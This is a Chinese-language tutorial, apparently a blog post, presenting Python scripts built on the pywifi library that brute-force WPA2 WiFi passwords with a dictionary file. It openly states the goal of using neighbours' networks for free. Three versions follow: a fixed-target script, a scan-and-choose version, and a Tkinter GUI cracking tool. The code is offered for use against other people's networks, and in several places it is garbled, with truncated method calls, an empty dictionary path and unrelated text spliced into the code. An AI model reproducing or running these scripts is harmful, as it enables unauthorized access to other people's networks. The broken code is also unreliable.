利⽤Python探测附近WIFI密码的详细代码前⾔
本⽂将记录学习下如何通过 Python 脚本实现 WIFI 密码的暴⼒破解,从⽽实现免费蹭⽹。
⽆图形界⾯
先来看看没有图形界⾯版的爆破脚本。
WIFI爆破
import pywifi
from pywifi import const
import time
import datetime
# 测试连接,返回链接结果
def wifiConnect(pwd):
# 抓取⽹卡接⼝
wifi = pywifi.PyWiFi()
# 获取第⼀个⽆线⽹卡
ifaces = wifi.interfaces()[0]
# 断开所有连接
ifaces.disconnect()
time.sleep(1)
wifistatus = ifaces.status()
if wifistatus == const.IFACE_DISCONNECTED:
# 创建WiFi连接⽂件
profile = pywifi.Profile()
# 要连接WiFi的名称
profile.ssid = "Tr0e"
# ⽹卡的开放状态
profile.auth = const.AUTH_ALG_OPEN
# wifi加密算法,⼀般wifi加密算法为wps
profile.akm.append(const.AKM_TYPE_WPA2PSK)
# 加密单元
profile.cipher = const.CIPHER_TYPE_CCMP
# 调⽤密码
profile.key = pwd
# 删除所有连接过的wifi⽂件
# 设定新的连接⽂件
tep_profile = ifaces.add_network_profile(profile)
# wifi连接时间
time.sleep(2)
if ifaces.status() == const.IFACE_CONNECTED:
return True
else:
return False
else:
print("已有wifi连接")
# 读取密码本
def readPassword():
success = False
print("****************** WIFI破解 ******************")
# 密码本路径
path = ""
# 打开⽂件
file = open(path, "r")
start = w()
python安装教程非常详细while True:
try:
pwd = adline()
# 去除密码的末尾换⾏符
pwd = pwd.strip('\n')
bool = wifiConnect(pwd)
if bool:
print("[*] 密码已破解:", pwd)
print("[*] WiFi已⾃动连接")
success = True
break
else:
# 跳出当前循环,进⾏下⼀次循环
print("正在破解 SSID 为 %s 的 WIFI密码,当前校验的密码为:%s"%("Tr0e",pwd))
except:
continue
end = w()
if(success):
print("[*] 本次破解WIFI密码⼀共⽤了多长时间:{}".format(end - start))
print("[*] 很遗憾未能帮你破解出当前指定WIFI的密码,请更换密码字典后重新尝试!")
exit(0)
if __name__=="__main__":
readPassword()
代码运⾏效果:
脚本优化
以上脚本需内嵌 WIFI 名、爆破字典路径,缺少灵活性。下⾯进⾏改造优化:
import pywifi
import time
from pywifi import const
# WiFi扫描模块
def wifi_scan():
# 初始化wifi
wifi = pywifi.PyWiFi()
# 使⽤第⼀个⽆线⽹卡
interface = wifi.interfaces()[0]
# 开始扫描
interface.scan()
for i in range(4):
time.sleep(1)
print('\r扫描可⽤ WiFi 中,请稍后。。。(' + str(3 - i), end=')')
print('\r扫描完成!\n' + '-' * 38)
print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名'))
# 扫描结果,scan_results()返回⼀个集,存放的是每个wifi对象
bss = interface.scan_results()
# 存放wifi名的集合
wifi_name_set = set()
for w in bss:
# 解决乱码问题
wifi_name_and_signal = (100 + w.signal, de('raw_unicode_escape').decode('utf-8'))
wifi_name_set.add(wifi_name_and_signal)
# 存⼊列表并按信号排序
wifi_name_list = list(wifi_name_set)
wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True)
num = 0
# 格式化输出
while num < len(wifi_name_list):
print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1]))
num += 1
print('-' * 38)
# 返回wifi列表
return wifi_name_list
# WIFI破解模块
def wifi_password_crack(wifi_name):
# 字典路径
wifi_dic_path = input("请输⼊本地⽤于WIFI暴⼒破解的密码字典(txt格式,每个密码占据1⾏)的路径:")    with open(wifi_dic_path, 'r') as f:
# 遍历密码
for pwd in f:
# 去除密码的末尾换⾏符
pwd = pwd.strip('\n')
# 创建wifi对象
wifi = pywifi.PyWiFi()
# 创建⽹卡对象,为第⼀个wifi⽹卡
interface = wifi.interfaces()[0]
# 断开所有wifi连接
interface.disconnect()
# 等待其断开
while interface.status() == 4:
# 当其处于连接状态时,利⽤循环等待其断开
pass
# 创建连接⽂件(对象)
profile = pywifi.Profile()
# wifi名称
profile.ssid = wifi_name
# 需要认证
profile.auth = const.AUTH_ALG_OPEN
# wifi默认加密算法
profile.akm.append(const.AKM_TYPE_WPA2PSK)
profile.cipher = const.CIPHER_TYPE_CCMP
# wifi密码
profile.key = pwd
# 删除所有wifi连接⽂件
# 设置新的wifi连接⽂件
tmp_profile = interface.add_network_profile(profile)
# 开始尝试连接
start_time = time.time()
while time.time() - start_time < 1.5:
# 接⼝状态为4代表连接成功(当尝试时间⼤于1.5秒之后则为错误密码,经测试测正确密码⼀般都在1.5秒内连接,若要提⾼准确性可以设置为2s或以上,相应暴⼒破解速度就会变慢)                if interface.status() == 4:
print(f'\r连接成功!密码为:{pwd}')
exit(0)
else:
print(f'\r正在利⽤密码 {pwd} 尝试破解。', end='')
# 主函数
def main():
# 退出标致
exit_flag = 0
# ⽬标编号
target_num = -1
while not exit_flag:
try:
print('WiFi'.center(35, '-'))
# 调⽤扫描模块,返回⼀个排序后的wifi列表
wifi_list = wifi_scan()
# 让⽤户选择要破解的wifi编号,并对⽤户输⼊的编号进⾏判断和异常处理
choose_exit_flag = 0
while not choose_exit_flag:
try:
target_num = int(input('请选择你要尝试破解的wifi:'))
# 如果要选择的wifi编号在列表内,继续⼆次判断,否则重新输⼊
if target_num in range(len(wifi_list)):
# ⼆次确认
while not choose_exit_flag:
try:
choose = str(input(f'你选择要破解的WiFi名称是:{wifi_list[target_num][1]},确定吗?(Y/N)'))
# 对⽤户输⼊进⾏⼩写处理,并判断
if choose.lower() == 'y':
choose_exit_flag = 1
elif choose.lower() == 'n':
break
# 处理⽤户其它字母输⼊
else:
print('只能输⼊ Y/N 哦o(* ̄︶ ̄*)o')
# 处理⽤户⾮字母输⼊
except ValueError:
print('只能输⼊ Y/N 哦o(* ̄︶ ̄*)o')
# 退出破解
if choose_exit_flag == 1:
break
else:
print('请重新输⼊哦(*^▽^*)')
except ValueError:
print('只能输⼊数字哦o(* ̄︶ ̄*)o')
# 密码破解,传⼊⽤户选择的wifi名称
wifi_password_crack(wifi_list[target_num][1])
print('-' * 38)
exit_flag = 1
except Exception as e:
print(e)
raise e
if __name__ == '__main__':
main()
脚本运⾏效果如下:
上述代码实现了依据信号强度枚举当前附近的所有 WIFI 名称,并且可供⽤户⾃主选择需要暴⼒破解的
WIFI,同时还可灵活指定暴⼒破解的字典,相对⽽⾔体验感提升了不少。进⼀步也可以将上述脚本打包⽣成 exe ⽂件,双击运⾏效果如下:
图形化界⾯
下⾯基于 Python 的 GUI 图形界⾯开发库 Tkinter 优化上述脚本,实现友好的可视化 WIFI 暴⼒破解界⾯⼯具。
关于 Tkinter 库的语法可参见:
简单版UI
from tkinter import *
from pywifi import const
import pywifi
import time
# 主要步骤:
# 1、获取第⼀个⽆线⽹卡
# 2、断开所有的wifi
# 3、读取密码本
# 4、设置睡眠时间
def wificonnect(str, wifiname):
# 窗⼝⽆线对象
wifi = pywifi.PyWiFi()
# 抓取第⼀个⽆线⽹卡
ifaces = wifi.interfaces()[0]
# 断开所有的wifi
ifaces.disconnect()
time.sleep(1)
if ifaces.status() == const.IFACE_DISCONNECTED:
# 创建wifi连接⽂件
profile = pywifi.Profile()
profile.ssid = wifiname
# wifi的加密算法
profile.akm.append(const.AKM_TYPE_WPA2PSK)
# wifi的密码
profile.key = str
# ⽹卡的开发
profile.auth = const.AUTH_ALG_OPEN
# 加密单元,这⾥需要写点加密单元否则⽆法连接
profile.cipher = const.CIPHER_TYPE_CCMP
# 删除所有的wifi⽂件
# 设置新的连接⽂件
tep_profile = ifaces.add_network_profile(profile)
# 连接
time.sleep(3)
if ifaces.status() == const.IFACE_CONNECTED:
return True
else:
return False
def readPwd():
# 获取wiif名称
wifiname = ().strip()
path = r'./'
file = open(path, 'r')
while True:
try:
# 读取
mystr = adline().strip()
# 测试连接
bool = wificonnect(mystr, wifiname)
if bool:
text.insert(END, '密码正确' + mystr)
text.see(END)
text.update()
file.close()
break
else:
text.insert(END, '密码错误' + mystr)
except:
continue
# 创建窗⼝
root = Tk()
root.title('wifi破解')
# 标签
label = Label(root, text='输⼊要破解的WIFI名称:')
# 定位
# 输⼊控件
entry = Entry(root, font=('微软雅⿊', 14))
# 列表控件
text = Listbox(root, font=('微软雅⿊', 14), width=40, height=10)
# 按钮
button = Button(root, text='开始破解', width=20, height=2, command=readPwd) id(row=2, columnspan=2)
# 显⽰窗⼝
root.mainloop()
脚本运⾏效果: